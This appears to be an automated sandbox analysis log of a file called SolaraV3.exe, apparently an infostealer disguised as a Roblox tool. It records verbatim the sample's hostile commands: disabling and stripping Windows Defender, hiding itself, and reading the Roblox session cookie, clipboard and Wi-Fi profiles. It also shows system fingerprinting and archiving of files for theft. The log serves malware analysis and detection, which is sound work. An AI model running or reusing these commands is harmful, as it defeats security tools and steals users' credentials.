Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
Source: C:\Users\user\Desktop\SolaraV3.exe File created: C:\Users\user~1\AppData\Local\Temp\_MEI28842
Source: SolaraV3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SolaraV3.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SolaraV3.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SolaraV3.exe ReversingLabs: Detection: 55%
Source: SolaraV3.exe String found in binary or memory: set-addPolicy
Source: SolaraV3.exe String found in binary or memory: id-cmc-addExtensions
Source: C:\Users\user\Desktop\SolaraV3.exe File read: C:\Users\user\Desktop\SolaraV3.exe
Source: unknown Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV3.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
